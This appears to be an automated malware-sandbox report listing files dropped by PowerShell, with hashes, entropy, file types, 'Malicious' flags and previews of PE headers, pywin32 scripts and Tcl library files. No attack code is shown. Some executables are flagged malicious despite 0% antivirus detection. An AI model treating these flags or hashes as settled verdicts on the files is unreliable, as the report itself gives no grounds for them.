                                                                                                                                                                                                                SHA1:E3DAE9D4B5DCD555A0A492ED0DF4A16B31317D57
                                                                                                                                                                                                                SHA-256:00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                                                                                                                                                                                                                SHA-512:976A2BCCD6119C082F08BE476220703552921B6286D1EC801226863D25B13D86DD81F90F6CC43FEF36E685275E9ECDFE0E00E2FD61D460C7DBB9F6444D233E53
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):108432
                                                                                                                                                                                                                Entropy (8bit):6.0921420023756525
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GGr:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+Hr
                                                                                                                                                                                                                MD5:765951BB101AC5B187537DA554BF99EB
                                                                                                                                                                                                                SHA1:E3DAE9D4B5DCD555A0A492ED0DF4A16B31317D57
                                                                                                                                                                                                                SHA-256:00C34A0CBBAEF1EF34B40EEF80221E6718B555FA2F0E0AED064F90855256890A
                                                                                                                                                                                                                SHA-512:976A2BCCD6119C082F08BE476220703552921B6286D1EC801226863D25B13D86DD81F90F6CC43FEF36E685275E9ECDFE0E00E2FD61D460C7DBB9F6444D233E53
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:Python script, ASCII text executable
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):27255
                                                                                                                                                                                                                Entropy (8bit):4.54686109057608
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:XOdxyBu5UtFTKxbNobBudHIZAN216JYUrV0Nqo43AllvC6c7e2wA0e7e8mim6BRG:edx4VW3gHKF/0ei/3Ywqdp3fkA9tt4
                                                                                                                                                                                                                MD5:600FB28442DFF01C8AC81FB41D22069F
                                                                                                                                                                                                                SHA1:3ECDBB8C321C08F1E3FD53E9F7D5DBA17133A46F
                                                                                                                                                                                                                SHA-256:7B8B384CDFD514A001E9A2DB67081EBF5E21A57828E8333DE16CD29C7DC80070
                                                                                                                                                                                                                SHA-512:40E5DFFA48CF567F5E23EB51BD1C626BFCD728E498880808F212E1E8A6A6C7C48CE2DC4AA3843620A8865D205B7AF5A87220AD2F37E644B56C1DEDE98FD51002
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:# postinstall script for pywin32.#.# copies PyWinTypesxx.dll and PythonCOMxx.dll into the system directory,.# and creates a pth file.import glob.import os.import shutil.import sys.import sysconfig..try:. import winreg as winreg.except:. import winreg..# Send output somewhere so it can be found if necessary....import tempfile..tee_f = open(os.path.join(tempfile.gettempdir(), "pywin32_postinstall.log"), "w")...class Tee:. def __init__(self, file):. self.f = file.. def write(self, what):. if self.f is not None:. try:. self.f.write(what.replace("\n", "\r\n")). except IOError:. pass. tee_f.write(what).. def flush(self):. if self.f is not None:. try:. self.f.flush(). except IOError:. pass. tee_f.flush()...# For some unknown reason, when running under bdist_wininst we will start up.# with sys.stdout as None but stderr is hooked up. This work
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:Python script, ASCII text executable
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3721
                                                                                                                                                                                                                Entropy (8bit):4.503953878580889
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:PPEYDOt7GfuKgqCgqgOEmgYl8AsOgN86VKmPJlCaUB2AIayrhKXyqMi:3f6wJgc6/hmPO/RyElMi
                                                                                                                                                                                                                MD5:E1CAA86E2F353C27A56DB2611A7E2AF6
                                                                                                                                                                                                                SHA1:B5B90B45976132E07D6E8B20B35C9A15E12A4CC1
                                                                                                                                                                                                                SHA-256:034CF44AAE45AF89AD73AD2FC17A793792458B418607656B318530B24FA37670
                                                                                                                                                                                                                SHA-512:756B397C4AFCC40E73BAAC22F29560F1A5D34D9F0A7A36BDF344EA81E656250717342759DDC43DCD37BA5DD3E004103DCB0E9D900A4D89E0F84ABDC9F2FE2BBD
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:"""A test runner for pywin32""".import os.import site.import subprocess.import sys..# locate the dirs based on where this script is - it may be either in the.# source tree, or in an installed Python 'Scripts' tree..this_dir = os.path.dirname(__file__).site_packages = [. site.getusersitepackages(),.] + site.getsitepackages()..failures = []...# Run a test using subprocess and wait for the result..# If we get an returncode != 0, we know that there was an error, but we don't.# abort immediately - we run as many tests as we can..def run_test(script, cmdline_extras):. dirname, scriptname = os.path.split(script). # some tests prefer to be run from their directory.. cmd = [sys.executable, "-u", scriptname] + cmdline_extras. print("--- Running '%s' ---" % script). sys.stdout.flush(). result = subprocess.run(cmd, check=False, cwd=dirname). print("*** Test script '%s' exited with %s" % (script, result.returncode)). sys.stdout.flush(). if result.returncode:. fa
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):108445
                                                                                                                                                                                                                Entropy (8bit):6.092435668278217
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Ga8:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+f8
                                                                                                                                                                                                                MD5:ECD198A3A89C1D2A900C3DACA774C3D9
                                                                                                                                                                                                                SHA1:C9C3673246425A147829649B6572CC7469429FAC
                                                                                                                                                                                                                SHA-256:2E1751884945C4035322579261ACD01AE545A5D905BFEF0F38FDC9289EB876B5
                                                                                                                                                                                                                SHA-512:33CC98E3C0963ADDA98210A1AE88B310372552972FA8A8A99B8E28E88F3C4198EC8026A328F3270DD270CC8EB15DFB62C2E980742F03DEEB4B872948BEBCA536
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):474
                                                                                                                                                                                                                Entropy (8bit):4.6960996263721775
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:kF3HTbyhnBIBAVYRby902MBIBLzDBIBL1Y6:kRH2IE024IRzNIRr
                                                                                                                                                                                                                MD5:52A5B43A45344E8DE4FAD9F37E91C59B
                                                                                                                                                                                                                SHA1:8FBA8792E4BF72682A1E6BFEAF9E5EA96C3E078C
                                                                                                                                                                                                                SHA-256:64D08A3ABCB271DB3AF043C535E045F7C325348D87A349A76864637BAEDD2554
                                                                                                                                                                                                                SHA-512:9A95C87D131F1AD4CA4132864E7F7E1821B4E24A084605D94B8748512EB5A197DCDCFD3D9AAC51DCE330E1E40A76E1C3EBA15F2D6E60AFCE0B898FCF433A7D3A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:if {[info sharedlibextension] != ".dll"} return..if {[package vsatisfies [package provide Tcl] 9.0-]} {.. package ifneeded dde 1.4.4 \... [list load [file join $dir tcl9dde14.dll] Dde]..} elseif {![package vsatisfies [package provide Tcl] 8.7]...&& [::tcl::pkgconfig get debug]} {.. package ifneeded dde 1.4.4 \... [list load [file join $dir tcldde14g.dll] Dde]..} else {.. package ifneeded dde 1.4.4 \... [list load [file join $dir tcldde14.dll] Dde]..}..
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):25600
                                                                                                                                                                                                                Entropy (8bit):5.531209790531261
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:cOKo+ZjdllRG1u6c9wPB7wbYSkyebfcm4gn:b0Ku6c9wJncd
                                                                                                                                                                                                                MD5:BE471FCF9729B279197A3529AB76E7C1
                                                                                                                                                                                                                SHA1:722DCDF864D09D5C0AFF0602A0DE6F6823FC16EE
                                                                                                                                                                                                                SHA-256:2B6A1B97F9BAF246E0FD6A4052C02572724BFA37EBA0460D9069E39F382A1B3D
                                                                                                                                                                                                                SHA-512:4C20DA557C5739E13A468B3EB879C1F9CA59B640017FC846C4A70707317DAF9E11D756296D942DCE0BCC4D2A8C30F5194A528E7A544D3178338C396D7267A529
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........nB..=B..=B..=...<@..=...<N..=...<J..=...<A..=...<C..=K.K=D..=...<G..=B..=...=...<C..=...<C..=...<C..=RichB..=................PE..d...3,.c.........." ...!.@...&.......B..............................................ZW....`.........................................`_..`...._..................................H...0Y...............................W..@............P...............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...x....p.......\..............@....pdata...............^..............@..@.reloc..H............b..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):21940
                                                                                                                                                                                                                Entropy (8bit):5.325305906485699
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:9SE8+P0ztNKmUpX3Pyoa1X3PyoMhYpRv3nvE2v2wtmsCJEAgo4eT:sCmUpPFa1PFMhY/vdf4sgEAgo4G
                                                                                                                                                                                                                MD5:F1C102426CF8A926AADF5CA9968F6F3C
                                                                                                                                                                                                                SHA1:1DD3718D51A5EE6CA0E9DB09710A868B2076B746
                                                                                                                                                                                                                SHA-256:3D4C390698EA24CB1C2AB0166C7C302EC056D841DC9F4B01979128824BCFC504
                                                                                                                                                                                                                SHA-512:D34C91A0DC6643D02810DAAED1FB12F20695328C97C8E1A51913A6F8DD453914BDAEEEDDB65C548EBC5CEBD98E5402A4AA53032D000120223ED7121CA019D308
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:/*.. * ----------------------------------------------------------------------------.. * nmakehlp.c --.. *.. *.This is used to fix limitations within nmake and the environment... *.. * Copyright (c) 2002 by David Gravereaux... * Copyright (c) 2006 by Pat Thoyts.. *.. * See the file "license.terms" for information on usage and redistribution of.. * this file, and for a DISCLAIMER OF ALL WARRANTIES... * ----------------------------------------------------------------------------.. */....#define _CRT_SECURE_NO_DEPRECATE..#include <windows.h>..#ifdef _MSC_VER..#pragma comment (lib, "user32.lib")..#pragma comment (lib, "kernel32.lib")..#endif..#include <stdio.h>..#include <math.h>..../*.. * This library is required for x64 builds with _some_ versions of MSVC.. */..#if defined(_M_IA64) || defined(_M_AMD64)..#if _MSC_VER >= 1400 && _MSC_VER < 1500..#pragma comment(lib, "bufferoverflowU")..#endif..#endif..../* ISO hack for dumb VC++ */..#ifdef _MSC_VER..#define snprintf._snprintf..#endif.....
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):62846
                                                                                                                                                                                                                Entropy (8bit):5.606177025504368
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:xaF+oYeZRyT+8Ch77407aW6myo2tlK9U7Z0knAL7K0gLWEtl4clFqcez:0yNTJw7WftlKyF0knAL7K0gLFb4mFwz
                                                                                                                                                                                                                MD5:4EB69138710894A01F44E14D5EB83136
                                                                                                                                                                                                                SHA1:5182B94DFD4F600A5DA7F72604C8727B0DC13342
                                                                                                                                                                                                                SHA-256:7A830EBDBE6C06293FBB3F1CAB39EF51C55FBCACC13DF7713871C0E9BD875684
                                                                                                                                                                                                                SHA-512:FD505DA9A9F3B90028C3B362BF2D50253BEEA5D6A5EC5F38EBA02F1F8CE17AA74ABC5EA6B05D72E10226E63E81CCF21C2B4699C40FAC1F0339D098EADFBF71DA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:#------------------------------------------------------------- -*- makefile -*-..# rules.vc --..#..# Part of the nmake based build system for Tcl and its extensions...# This file does all the hard work in terms of parsing build options,..# compiler switches, defining common targets and macros. The Tcl makefile..# directly includes this. Extensions include it via "rules-ext.vc"...#..# See TIP 477 (https://core.tcl-lang.org/tips/doc/main/tip/477.md) for..# detailed documentation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..# Copyright (c) 2001-2003 David Gravereaux...# Copyright (c) 2003-2008 Patrick Thoyts..# Copyright (c) 2017 Ashok P. Nadkarni..#------------------------------------------------------------------------------....!ifndef _RULES_VC.._RULES_VC = 1....# The following macros define the version of the rules.vc nmake build system..# For modifications that are not backward-compat
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2606
                                                                                                                                                                                                                Entropy (8bit):5.467909915722982
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:+v+e9BZMsMRDbvpwycYqUQniVuy2r5q+RX8hQg+IoAIoYYgXMgUFHgsgCg3+IoWn:4x9osWDDpwfY0aCltPgfoJoxgXMgwgsE
                                                                                                                                                                                                                MD5:7D37AEAB54B232E1956055C601AD009A
                                                                                                                                                                                                                SHA1:BC29520B636978112D7C64925BD35A7669F1E461
                                                                                                                                                                                                                SHA-256:48F59BA7C8050DE1CE04EDE45F1F8A8488CFE7748BF9A0D845D550CD31451E2B
                                                                                                                                                                                                                SHA-512:09B82E00A8B8B20D86C65B93F1DF2BA68726583A641B06B154B14448EC490B1B7827D11291FACC62389799D1BCA9B4F85F4F89DEB3550818AAA4DA86526B9732
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:#------------------------------------------------------------- -*- makefile -*-..# targets.vc --..#..# Part of the nmake based build system for Tcl and its extensions...# This file defines some standard targets for the convenience of extensions..# and can be optionally included by the extension makefile...# See TIP 477 (https://core.tcl-lang.org/tips/doc/main/tip/477.md) for docs.....$(PROJECT): setup pkgindex $(PRJLIB)....!ifdef PRJ_STUBOBJS..$(PROJECT): $(PRJSTUBLIB)..$(PRJSTUBLIB): $(PRJ_STUBOBJS)...$(LIBCMD) $**....$(PRJ_STUBOBJS):...$(CCSTUBSCMD) %s..!endif # PRJ_STUBOBJS....!ifdef PRJ_MANIFEST..$(PROJECT): $(PRJLIB).manifest..$(PRJLIB).manifest: $(PRJ_MANIFEST)...@nmakehlp -s << $** >$@..@MACHINE@. $(MACHINE:IX86=X86)..<<..!endif....!if "$(PROJECT)" != "tcl" && "$(PROJECT)" != "tk"..$(PRJLIB): $(PRJ_OBJS) $(RESFILE)..!if $(STATIC_BUILD).. $(LIBCMD) $**..!else.. $(DLLCMD) $**.. $(_VC_MANIFEST_EMBED_DLL)..!endif.. -@del $*.exp..!endif....!if "$(PRJ_HEADERS)
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):87
                                                                                                                                                                                                                Entropy (8bit):4.318506571923692
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:OuMvdQ5FmFA3Bnzj3PHGv:OuEQ5F1BPPY
                                                                                                                                                                                                                MD5:F6EF2EE18C48F4AFA415A117A9E59356
                                                                                                                                                                                                                SHA1:9EDD8582FD49A3B0255D1C3B4B30244A4E27D155
                                                                                                                                                                                                                SHA-256:03589B111B1A9A4DACA7FC3014F9F0ADE84E875948BE925E30726423C063089E
                                                                                                                                                                                                                SHA-512:45D2BEFCB6EC99B287678773F97221DCB71678E8A0BFCF6E9F1D24703617E36B7D7917D7460A6E5E9136ADF8B389F7802AC2BEB0171A9F2DBE8D0F7F00F3E073
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:CORE_MACHINE = AMD64..CORE_DEBUG = 0..CORE_TCL_THREADS = 1..CORE_USE_THREAD_ALLOC = 1..
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):25600
                                                                                                                                                                                                                Entropy (8bit):4.94441225384733
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:OSZ/JKNZKZCGRHJPth4VKAvDgDJgoku8:OSQQTRJPzkKAEN
                                                                                                                                                                                                                MD5:ABBD49C180A2F8703F6306D6FA731FDC
                                                                                                                                                                                                                SHA1:D63F4BFE7F74936B2FBACE803E3DA6103FBF6586
                                                                                                                                                                                                                SHA-256:5F411C0BD9ED9A42B0F07ED568C7D0CF358A83063B225A1F8F7DA3296DDE90F1
                                                                                                                                                                                                                SHA-512:290DD984ACC451B778F3DB8C510BAE7AEC1D9547C3AD0A1829DF731C136E4ECC9A37DC6A786CF8F1ECC4D14339AED1288AF25055F450F6F953138C8D4D5C36E9
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./.... .....`................@.............................................. ..............................................................`...............................................U..(...................................................text...X,..........................`.P`.data........@.......2..............@.`..rdata..@....P.......<..............@.`@.pdata.......`.......L..............@.0@.xdata.. ....p.......P..............@.0@.bss.... .............................`..idata...............T..............@.0..CRT....h............`..............@.@..tls.................b..............@.@.........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):367
                                                                                                                                                                                                                Entropy (8bit):4.633662369394115
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:CsUgabAOgjD/0JDKykDjvFJbCfX7MQ9Q3dEIBSGERWZof7MQ9Q3dEIBSGzI8W6:lGbyCWF3HgGdEIBewZ/dEIBRIH6
                                                                                                                                                                                                                MD5:2432EB4BB85317F6C0D1CB14234664B3
                                                                                                                                                                                                                SHA1:61A9827F5CE90B47B1FC0C7D7C7470CB3313787B
                                                                                                                                                                                                                SHA-256:1BD0FC8CBA2BB1CDD5E5CFCC614B0EF4C8CF4698904D1E48C0F103519C5579E0
                                                                                                                                                                                                                SHA-512:DEE270A417BBDACCED81A92E27A6BD94304B074EF20F1506DF8EB1A7B5CA85E6F156A569356B1027F9E2673A8E091213C14DDB7B97F0E4526E0F6659E6C6F5C3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:if {![package vsatisfies [package provide Tcl] 8.5]} return..if {[info sharedlibextension] != ".dll"} return..if {[::tcl::pkgconfig get debug]} {.. package ifneeded registry 1.3.5 \.. [list load [file join $dir tclreg13g.dll] Registry]..} else {.. package ifneeded registry 1.3.5 \.. [list load [file join $dir tclreg13.dll] Registry]..}..
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                Entropy (8bit):5.504085917381921
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:Egd2+KQiARRvWDEBAYdCRVv9evQqlXETxjEf9+zxYwDeXyLAfQI:tARqvWDsPCRVNqlX7SxxDKyMF
                                                                                                                                                                                                                MD5:50BD70865CD710FF916CF7D5D3F6087B
                                                                                                                                                                                                                SHA1:42D25E2ADE2A29114FD11789E97B780F7748CB9C
                                                                                                                                                                                                                SHA-256:3CC348B30B1B7C130AA7ADBD325972FB91A475895B1AB827150BDB923FA6A5D6
                                                                                                                                                                                                                SHA-512:A1F97A36EB98B99EEEA61257B2411FDFCBD3DC9CE38AEBF10A16018EC9C2FF1AB916A6A4FA4781AAAC1F7D53F0FE5C424E4C67715E38ED37EE8FF7475A36FADA
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.5.r.[.r.[.r.[..Z.p.[..^.~.[.._.z.[..X.q.[..._.s.[.{..t.[...Z.u.[.r.Z.F.[...S.s.[...[.s.[...Y.s.[.Richr.[.........PE..d...3,.c.........." ...!.2...&...... 6..............................................xv....`.........................................0`..h....`..................................\...PY...............................X..@............P...............................text...H1.......2.................. ..`.rdata.......P.......6..............@..@.data...h....p.......N..............@....pdata...............P..............@..@.reloc..\............T..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):21523
                                                                                                                                                                                                                Entropy (8bit):4.827830596623684
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:UqT9XC9VZv9QXCTxsCTHI7672ORgS0mzBvxFRTX7Xvt3wBTnFXhCUvuyqz:LT9XC9VZviXCVsCLI7JlmzBvTxvt3gTW
                                                                                                                                                                                                                MD5:08EDF746B4A088CB4185C165177BD604
                                                                                                                                                                                                                SHA1:395CDA114F23E513EEF4618DA39BB86D034124BF
                                                                                                                                                                                                                SHA-256:517204EE436D08EFC287ABC97433C3BFFCAF42EC6592A3009B9FD3B985AD772C
                                                                                                                                                                                                                SHA-512:C1727E265A6B0B54773C886A1BCE73512E799BA81A4FCEEEB84CDC33F5505A5E0984E96326A78C46BF142BC4652A80E213886F60EB54ADF92E4DFFE953C87F6B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# auto.tcl --..#..# utility procs formerly in init.tcl dealing with auto execution of commands..# and can be auto loaded themselves...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# auto_reset --..#..# Destroy all cached information for auto-loading and auto-execution, so that..# the information gets recomputed the next time it's needed. Also delete any..# commands that are listed in the auto-load index...#..# Arguments:..# None.....proc auto_reset {} {.. global auto_execs auto_index auto_path.. if {[array exists auto_index]} {...foreach cmdName [array names auto_index] {... set fqcn [namespace which $cmdName]... if {$fqcn eq ""} {....continue... }... rename $fqcn {}...}.. }.. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath.. if {
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):133439
                                                                                                                                                                                                                Entropy (8bit):5.044814789288095
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:Cbn4IAhYvuCg9epsArAzqpSMpWzP7ejMiIAxBPqGYkPAPaZpHYM8EN4LhVLlarXL:Cbn4IM9epsArSqpSMpWzP7ejM/eBPqG3
                                                                                                                                                                                                                MD5:88BB44A1364147FDD80F9FD78FBCEF61
                                                                                                                                                                                                                SHA1:2C3454D2669F0CA83FECF17976D599C85B86E615
                                                                                                                                                                                                                SHA-256:1947F8B188AB4AB6AA72EA68A58D2D9ADD0894FDF320F6B074EAE0F198368FB7
                                                                                                                                                                                                                SHA-512:010B13E8A2D50521B5D7ADCC5F32F7CDE3F12E1053961C575D967DC6CFD368640BF45D23832E5E9C3868CDCA9FE0505698F949C5557D4169353634C94AA196B5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:#----------------------------------------------------------------------..#..# clock.tcl --..#..#.This file implements the portions of the [clock] ensemble that are..#.coded in Tcl. Refer to the users' manual to see the description of..#.the [clock] command and its subcommands...#..#..#----------------------------------------------------------------------..#..# Copyright (c) 2004-2007 Kevin B. Kenny..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#----------------------------------------------------------------------....# We must have message catalogs that support the root locale, and we need..# access to the Registry on Windows systems.....uplevel \#0 {.. package require msgcat 1.6.. if { $::tcl_platform(platform) eq {windows} } {...if { [catch { package require registry 1.1 }] } {... namespace eval ::tcl::clock [list variable NoRegistry {}]...}.. }..}....# Put the library directory in
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1110
                                                                                                                                                                                                                Entropy (8bit):2.1033474959326957
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:5c2VBUvEWVrVJ/eyN9j2iV2NdWWT0VbusV7EV7KVAMmVZyd851VFpsGkliX:5HVBUlJvRj7SOVbusZhAMiZyi77qsX
                                                                                                                                                                                                                MD5:9E3A454FA480E9A99D2D5ACDAA775233
                                                                                                                                                                                                                SHA1:493637BB570A5C96BB62F998BD0391FB59AFC5F0
                                                                                                                                                                                                                SHA-256:FB87BF197F4F485B08EA81F7534BC07D9C3A538D022424BE11011A1FE3C413FD
                                                                                                                                                                                                                SHA-512:EDFCB2BB6AB052D28D5CEBD08AD57F36D3A4CB83D557B1359B0ADE1266E24D8F3CE87B8240881396A5BA4FB45F8B74014784E8885CDB86680D98977CC0D130F0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# Encoding file: ascii, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
